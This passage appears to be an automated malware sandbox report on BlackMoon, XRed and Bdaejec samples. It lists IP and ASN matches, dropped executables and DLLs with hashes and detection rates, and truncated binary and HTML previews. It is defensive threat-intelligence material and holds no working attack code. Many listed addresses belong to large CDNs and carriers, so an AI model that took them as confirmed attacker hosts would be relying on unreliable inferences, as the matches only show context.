                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • 104.192.110.226
                                                                                                                SecuriteInfo.com.Win32.Trojan.Kryptik.HK@susp.11565.26013.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                https://www.so.com/link?m=bHHIH9gHiWMt7CT52Mk%2FHVbpA4Q7HLpfa%2Fe58lRjM9C9UVI%2BR7UmsSaIs1wIDRUJSJpxHEWC1%2BYp0sKM%2Fqs2t2rWnaBABhH9Okw2hj0SG5Er8qYCL76sO1Txz1%2BBPXh5CUJd9No6kEqqeY436Get hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                www.jmw.com.cn3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 47.94.225.221
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 47.94.225.221
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 47.94.225.221
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 47.94.225.221
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 47.94.225.221
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 47.94.225.221
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • 47.94.225.221
                                                                                                                multi-az-www-api.kuaishou.com3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 103.107.217.26
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 103.102.202.106
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 103.102.202.125
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 103.107.217.26
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 103.102.202.144
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • 103.102.202.144
                                                                                                                www.douyin.com.queniuyk.com3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 163.181.130.191
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 163.181.130.189
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.181.201.232
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.181.92.243
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.181.92.240
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • 163.181.92.246
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.181.92.229

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                QUANTILNETWORKSUS3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 163.171.208.133
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 163.171.208.133
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 163.171.128.148
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.171.132.119
                                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 220.242.169.9
                                                                                                                GycOGRBrXW.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 116.254.189.186
                                                                                                                mirai.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 116.254.159.14
                                                                                                                http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                • 138.113.35.27
                                                                                                                https://www.allegroh.cc/Get hashmaliciousUnknownBrowse
                                                                                                                • 163.171.128.148
                                                                                                                SecuriteInfo.com.Win32.Application.Playtech.A.4150.17083.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 163.171.131.248
                                                                                                                CHINA169-BACKBONECHINAUNICOMChina169BackboneCN3.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 27.221.16.149
                                                                                                                154.216.17.9-skid.ppc-2024-08-04T06_22_51.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 121.17.68.42
                                                                                                                154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 117.11.27.139
                                                                                                                154.216.17.9-skid.arm7-2024-08-04T06_23_04.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 1.190.254.139
                                                                                                                154.216.17.9-skid.x86_64-2024-08-04T06_23_14.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 116.95.199.155
                                                                                                                154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 220.197.8.18
                                                                                                                45.66.231.148-mips-2024-07-31T23_07_02.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 60.6.178.180
                                                                                                                77.90.35.9-skid.arm5-2024-07-30T07_10_52.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 183.187.72.189
                                                                                                                77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 123.135.155.111
                                                                                                                77.90.35.9-skid.ppc-2024-07-30T07_10_49.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 101.206.137.10
                                                                                                                QIHOOBeijingQihuTechnologyCompanyLimitedCN3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                • 104.192.110.226
                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 104.192.110.226
                                                                                                                f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                • 104.192.110.226
                                                                                                                f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                mirai.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 101.199.221.204
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.192.110.226
                                                                                                                LisectAVT_2403002C_44.exeGet hashmaliciousEICARBrowse
                                                                                                                • 104.192.108.20
                                                                                                                d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                • 104.192.110.226
                                                                                                                94.156.8.9-skid.sh4-2024-07-23T17_40_06.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 101.199.91.156

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Program Files (x86)\Java\DC1FFAF.exe3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                  1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                    f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                      d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                        C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dll3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                          1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                            f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                              C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dll3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                                1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                  f2.exeGet hashmaliciousBlackMoonBrowse

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Program Files (x86)\Java\DC1FFAF.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1168440
                                                                                                                                    Entropy (8bit):7.834939987470682
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:FNNUQIzh8Vd7EuHu3Z2E+XT9uZk2utlyvyaPko32:nueoJ5CUZ3uvwyaa
                                                                                                                                    MD5:0D79B45E55C20F14D9614596247B7DF2
                                                                                                                                    SHA1:F0E86CFFCAE509CC311F2BE6CC1C87CFB5616480
                                                                                                                                    SHA-256:A0C15F709E1B80E93A61CBA414E266097DC8C23A7E8DE2B6DBE825CA2952DF7E
                                                                                                                                    SHA-512:23FEF0EC6A846A96157C7F83104FA7A4B871A5244E0CF30B42513D5E8885D2E9164B30EC2C881945F6B761B294CD4A17321593C05B383414A7212316CFFCB8A4
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: f2.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe, Detection: malicious, Browse
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................3+............@..............................................@..........................,;..<.... ...............................................................................0..`...........................0.DE................................@...1.TA.....I.......4..................@...2.S......L...`..........................3.data..z*..........................@...4.ls....................................5.data..............................@...6.eloc..................................7.src........ ......................@...8.ext...............................@...9.data.......0......................@...10.ta....q...@......................@...........................................................

                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x9ea43197, page size 16384, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1310720
                                                                                                                                    Entropy (8bit):0.6291698988781882
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:XSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Xaza9iJa+2UtmOQOL
                                                                                                                                    MD5:D6BA131237A83E02D9B7E085504681C0
                                                                                                                                    SHA1:61096EB4402C79604A8A8B41A3495CAF2C136196
                                                                                                                                    SHA-256:337A0E8D0C9927C7C4BCD50511805448E515CBAFBA6717D1D3C81130B926C894
                                                                                                                                    SHA-512:EEC4F7C7E82683B9DE88BB4439430730608E6006898972EA8018F032D82A9ABFFAA7C0A1C9486083FB445B9329F01B1DAEC9901760B5A98FCB7F151B14779C69
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:..1.... .......P.......X\...;...{......................0.j...... ...|.......|..h.g...... ...|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................$.. ...|....................... ...|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\0CPR6LBX.htm

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:HTML document, ISO-8859 text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2607
                                                                                                                                    Entropy (8bit):6.224458882218847
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:z45m5ZcnRdg9s2AGY1zVvZVXVP63P+ZVvylAx1w8I:++cRdga247rFPTcPp
                                                                                                                                    MD5:BDAF5B83E0A9CBF50B2AB84D6E1E057F
                                                                                                                                    SHA1:B615889FAACF288FD753E10D322094985BB04ED5
                                                                                                                                    SHA-256:57EB2963201B437F3BDBADD30E5995EFDA9E6726DF2D09C1C9AE21E0663EA147
                                                                                                                                    SHA-512:5A426AA5E96FBEFA8F064EB50343C415C1985C46F5312F5BE5F9A7A4F479334F9613A20B7B5ABC89005D933D535074CB780606B0FB934D31144413353F81B960
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<script> ..alert("........................................................499R.............399R.....................");..alert("...................www.baxingfz.com www.baxingfuzhu.com www.8090cqfz.com wg798.com www.wg200.com ");..</script>..<style type="text/css"> ..body{font-family: ......;background:#F4F5F7;margin:0} ...content{width:100%;color:#fff;float:left;margin-right:-240px} ...inner{height:130px;margin-right:10px}...inner .x1{padding:0px 12px;margin-top:10px;}...inner a{text-decoration:none;font-size:16px; color:#516A9C; }...inner a:hover{text-decoration:none; }.. ...side{width:800px;height:190px;padding:0px 48px;center;color:#fff;float:left;margin-top:10px;}...side .b1{padding:1px 5px;margin-top:10px;float:left;}...side .b1 a{text-decoration:none;font-size:18px; color:#fff; padding:5px 10px; background:#FF6600; font-weight:bold; border-radius:4px;}...side .b1 a:hover{text-decoration:none; background:#FBAB06; color:#fff;}.. ...footer{

                                                                                                                                    C:\Users\user\Desktop\1.lnk

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Oct 5 05:47:17 2023, mtime=Tue Aug 6 07:29:07 2024, atime=Tue Aug 6 07:29:04 2024, length=30373888, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):553
                                                                                                                                    Entropy (8bit):5.164966659790986
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:8mr+VzYNbRawmwPIa9jAR2ykR8plZnDvo1vomV:8mr5nxm45ARrqaDvAvom
                                                                                                                                    MD5:83EA2935D7EC98ECF24051B215AE6750
                                                                                                                                    SHA1:E41D45A0C3C1A4E86B0D1EEA5D860C55EFA7B581
                                                                                                                                    SHA-256:337A6EDEAC1A7A0C72B836D108A2955D8AE104476F253F1E9DA8FA1EED6FB61C
                                                                                                                                    SHA-512:9B8EE61B8CEB5D53EF1C844DB01ED60A59DD97C7DFA919EE76C357E5811564E41B9BD7FAEBEBAF1BB4CAD102F897A2D036635070351B0723E2726465B9EC7417
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:L..................F.... ....O?.W...v......1jm......x...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S...HIa.W....=........P.2..x...Y.C .1.exe.<......EW.5.Y.C.............................1...e.x.e.......N...............-.......M.............d{.....C:\Users\user\Desktop\1.exe......\.1...e.x.e...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.e.s.k.t.o.p.`.......X.......093954...........hT..CrF.f4... .b...Jc...-...-$..hT..CrF.f4... .b...Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):364032
                                                                                                                                    Entropy (8bit):7.874668264129561
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:rSQlcOmBAD7fxrVyqVENIxKMFpeJ0LgRtcRtd:W+n6Ax0WuSKM360URtq
                                                                                                                                    MD5:60187C5081DF7F3EE20C834C6E1BEA1D
                                                                                                                                    SHA1:50CE14D15FDB27E8E98B1CA43AF3C2C45B3A81B2
                                                                                                                                    SHA-256:7C00A8190DD048B43DEB36E99E52864DE4DC25211993426CBA32891F8F8824B2
                                                                                                                                    SHA-512:925D2E52ED3968E5CE6570394D2B7D7003AD67CDF5AF7D9CEC9E60121AABC44733AC7A00811D242E96F035CCF3442812A83986E6CF809FE643634C50ADE707F3
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: f2.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^......^...}...^..}.,..^...&9..^...&)..^...^..K\..../..^....9.k^....>.Y^....0..^....(..^.......^....+..^..Rich.^..................PE..L...<F.f...........!.........6......Hs..............................................Ij....@..........................I..4....g..|........7......................|...,...................................@...............$... ...@....................text............................... ..`.rdata..t+..........................@..@.data...............................@....vvvt0..............................`..`.vvvt1...{...@...|..................`....reloc..|...........................@..@.rsrc....7..........................@..@........................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):364032
                                                                                                                                    Entropy (8bit):7.874668264129561
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:rSQlcOmBAD7fxrVyqVENIxKMFpeJ0LgRtcRtd:W+n6Ax0WuSKM360URtq
                                                                                                                                    MD5:60187C5081DF7F3EE20C834C6E1BEA1D
                                                                                                                                    SHA1:50CE14D15FDB27E8E98B1CA43AF3C2C45B3A81B2
                                                                                                                                    SHA-256:7C00A8190DD048B43DEB36E99E52864DE4DC25211993426CBA32891F8F8824B2
                                                                                                                                    SHA-512:925D2E52ED3968E5CE6570394D2B7D7003AD67CDF5AF7D9CEC9E60121AABC44733AC7A00811D242E96F035CCF3442812A83986E6CF809FE643634C50ADE707F3
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: f2.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^......^...}...^..}.,..^...&9..^...&)..^...^..K\..../..^....9.k^....>.Y^....0..^....(..^.......^....+..^..Rich.^..................PE..L...<F.f...........!.........6......Hs..............................................Ij....@..........................I..4....g..|........7......................|...,...................................@...............$... ...@....................text............................... ..`.rdata..t+..........................@..@.data...............................@....vvvt0..............................`..`.vvvt1...{...@...|..................`....reloc..|...........................@..@.rsrc....7..........................@..@........................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):697344
                                                                                                                                    Entropy (8bit):7.987740216318556
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:ZJOpSSP/ct8PFEWQ6dLBOCRf747xLwV3bgJx6I2jnkP:MJPkEi9g47xsV32n2L
                                                                                                                                    MD5:635EA65C178C0AF1337A0D9BA23B9880
                                                                                                                                    SHA1:F0A9C2D5F8BCCDA8199FF48CD00DDD1F44D9C8A9
                                                                                                                                    SHA-256:382D06362E60A6FC7E4E7BF02C43B3B9243F74FB2463C62D9AC386E4E26F25A1
                                                                                                                                    SHA-512:F19D2DD5A824D042C469A09FA04D8D94722CAE97E2E3B7FC6F15D86333E49BB1C57B6B2246F26E753C22BCCBEF28BCE6E5C14D9471170A2193F7DB5955E1C9BE
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....!xY............................. ...........@..........................P ............................................../ ......P......................T/ ......................................................................................text....p..........................@....itext... ..........................@....data............:..................@....bss.....`...0......................@....idata...@..........................@....didata.............................@....edata..............................@....reloc...`.......(... ..............@....rsrc........P...F...H..............@....aspack.. ... .....................@....adata.......@ .....................@...........................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):163840
                                                                                                                                    Entropy (8bit):6.306746357940625
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:fs2c0aBV0bdukL+s45w+Icr6Hizu7HRtCfWpZQvYwvOSDc89DlMQFZ8J5/Bw9bmo:f1cB3kukL+sQw+XCnRtQaeU89LK/BIm
                                                                                                                                    MD5:203CD4EC29A18F1C8A1DDEFADC3F7382
                                                                                                                                    SHA1:47A4072EDF7C4530D4E86B84CBE5118E277DE543
                                                                                                                                    SHA-256:566086537066D3FF72167F09ADC2522AC72D24DA0601E7966367A8A85802A121
                                                                                                                                    SHA-512:28FB3CF0D811F35C387BB666070CE5B6422401E59D0748E420C246EFCF7F3ECBE6EE938242D7E93103083E9B45590ABE0E864E540B953BD3C4F3949B3D579A19
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......tN..0/..0/..0/..0/..4/...0..1/...'..2/..K3..1/..f0..5/..R0..8/...3..2/.._0..3/.._0..4/.._0..2/......5/..0/.../...0.../......7/...)..1/......1/..Rich0/..........PE..L......W...........!................+...............................................................................@................`..........................`....................................................................................text...>........................... ..`.rdata...2.......@..................@..@.data....5... ... ... ..............@....rsrc........`... ...@..............@..@.reloc..>........ ...`..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1932288
                                                                                                                                    Entropy (8bit):7.366995838839318
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:chCOQLRu0C29Fl2aC5Cprjni1ct/dSeWMgyUnPDwANtydlYxYIagSYAGIzKY19yH:Mj8CuVC5Cd7gczSFpPnYIyYAbZ/y4fy
                                                                                                                                    MD5:9392BB44020A52F4233BB44190D0904E
                                                                                                                                    SHA1:6687ED15382F8796C8FBEC02E4E1CA8F1C4C2DB3
                                                                                                                                    SHA-256:763E67725292FA6F56333002845FC47EA2DDF632DDD8BBC1F967F7C8E5DFA20B
                                                                                                                                    SHA-512:E1ADE9E24CB02B0A2AFCBC984507D1CB32924180D3CEEDABF3AE83008899AE543C7C39DB30B8DB29C4999F8BDAD7447BF6DCA6A4628787B4CF8C69346AD6E1D1
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uK...%...%...%.76...%.iZ....%.b....%.b...%..l....%...$.z.%..l....%.b....%.b....%.b....%.b....%.Rich..%.........PE..L...W.nf.....................@.......r............@.......................................@.................................4...h........'...................0.....0............................... ...@............................................text............................... ..`.rdata.............................@..@.data...@j...p...(...T..............@....vmp0...Ro.......p...|..............`....vmp1........P......................`....reloc......0......................@..@.rsrc....'.......(...T..............@..@................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\1F0xyrmp.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4744704
                                                                                                                                    Entropy (8bit):6.6650839563858515
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:JeP71Yv5+I6GKuUKx7uhvxUe2OIMk7RJdu4IvSTmo8wEgMDOdK1rXFl6uwZqQQYC:Je5DNmu98hRJdu4IvSTmo8wEgMDOdGvx
                                                                                                                                    MD5:695A41CD6529A1D4761F989E1BDC1BCA
                                                                                                                                    SHA1:FF900F5B867491E5A1B577D4AC18CAD26BC766F7
                                                                                                                                    SHA-256:F44F6A43ED807169DED6CB176DC7B723859238588D978C7AC34D60D7037491E2
                                                                                                                                    SHA-512:2E0042D355E2D4C06EB310A4882BE7B03E2169F2411BBE4C7BFBFA5FD4614CCF2046E914C040E6DB103DF0D8A0805FE567D353CF562731B997F5522C6EE0AAFB
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.A'+./t+./t+./tr.<t)./t...t"./tD..tn./tD..t~./t"..t-./t+..tC./t"..t<./tD..t=./t+./t*./tD..t../tD..t*./tRich+./t........PE..L....J.f...........!......6.."........3.......6...............................H...........@.................................t.=..............................pE..t..P.6.............................@.;.@.............6.T............................text....6.......6................. ..`.rdata...Q....6..R....6.............@..@.data.........>.......=.............@....vmp0....D... E..F....D.............`..`.reloc...t...pE..v....D.............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\42EEXUWWZ.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4744704
                                                                                                                                    Entropy (8bit):6.6650839563858515
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:JeP71Yv5+I6GKuUKx7uhvxUe2OIMk7RJdu4IvSTmo8wEgMDOdK1rXFl6uwZqQQYC:Je5DNmu98hRJdu4IvSTmo8wEgMDOdGvx
                                                                                                                                    MD5:695A41CD6529A1D4761F989E1BDC1BCA
                                                                                                                                    SHA1:FF900F5B867491E5A1B577D4AC18CAD26BC766F7
                                                                                                                                    SHA-256:F44F6A43ED807169DED6CB176DC7B723859238588D978C7AC34D60D7037491E2
                                                                                                                                    SHA-512:2E0042D355E2D4C06EB310A4882BE7B03E2169F2411BBE4C7BFBFA5FD4614CCF2046E914C040E6DB103DF0D8A0805FE567D353CF562731B997F5522C6EE0AAFB
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.A'+./t+./t+./tr.<t)./t...t"./tD..tn./tD..t~./t"..t-./t+..tC./t"..t<./tD..t=./t+./t*./tD..t../tD..t*./tRich+./t........PE..L....J.f...........!......6.."........3.......6...............................H...........@.................................t.=..............................pE..t..P.6.............................@.;.@.............6.T............................text....6.......6................. ..`.rdata...Q....6..R....6.............@..@.data.........>.......=.............@....vmp0....D... E..F....D.............`..`.reloc...t...pE..v....D.............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):5095424
                                                                                                                                    Entropy (8bit):6.573640794066719
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:8/Gq9tQ0I2sfjn+1LOfPR6F2+5bT7j5R31:e9t9I2vLOfPot
                                                                                                                                    MD5:AAA5DC054C587BCB8101660A9C08F0EC
                                                                                                                                    SHA1:1AAEA461D0B7DF8287B9269F945573F7BBD773A5
                                                                                                                                    SHA-256:3E0E15C5C5D2B5868B768E1AB71EAE9A2900B2341CF589272D571A0E3817A4E2
